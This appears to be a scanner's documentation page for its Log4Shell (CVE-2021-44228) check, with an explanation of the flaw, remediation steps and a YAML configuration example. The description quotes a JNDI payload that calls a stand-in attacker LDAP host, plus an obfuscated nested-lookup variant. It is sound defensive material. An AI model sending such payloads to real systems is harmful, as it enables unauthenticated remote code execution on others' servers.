Injection: Log4Shell

Identifier: log4shell

Scanner(s) Support

- GraphQL Scanner
- REST Scanner
- WebApp Scanner

Description

Log4Shell (CVE-2021-44228) is an unauthenticated remote code execution flaw in Apache Log4j 2, affecting releases 2.0-beta9 through 2.14.1. When the library formats a log message it expands lookup expressions of the form ${prefix:key}, and one of those lookups, jndi, resolves a JNDI name over protocols such as LDAP and RMI. Because message lookups were enabled by default and applied to the logged string itself, any attacker-controlled value that reaches a log call (a User-Agent header, a username, a query parameter) can carry ${jndi:ldap://attacker-host/x}: the server then connects to the attacker's LDAP server and can be made to load and execute a class it serves. Exploitation is a single request with no authentication, which is why the flaw was abused at scale before most deployments were patched. Attackers also hide the trigger behind nested lookups such as ${${lower:j}ndi:...} to evade naive string matching, so a check that only greps for the literal "jndi" misses real payloads.

Remediation is to upgrade Log4j 2 to a fixed release (2.17.1 or later); where that is not immediately possible, removing the JndiLookup class from log4j-core (zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class) disables the lookup entirely. This check probes the target for the flaw across the asset types listed in assets_allowed.

Configuration

Example

Example configuration:

---
security_tests:
  log4shell:
    assets_allowed:
    - REST
    - GRAPHQL
    - WEBAPP
    skip: false

Reference

assets_allowed

Type : List[AssetType]*

List of assets that this check will cover.

skip

Type : boolean

Skip the test if true.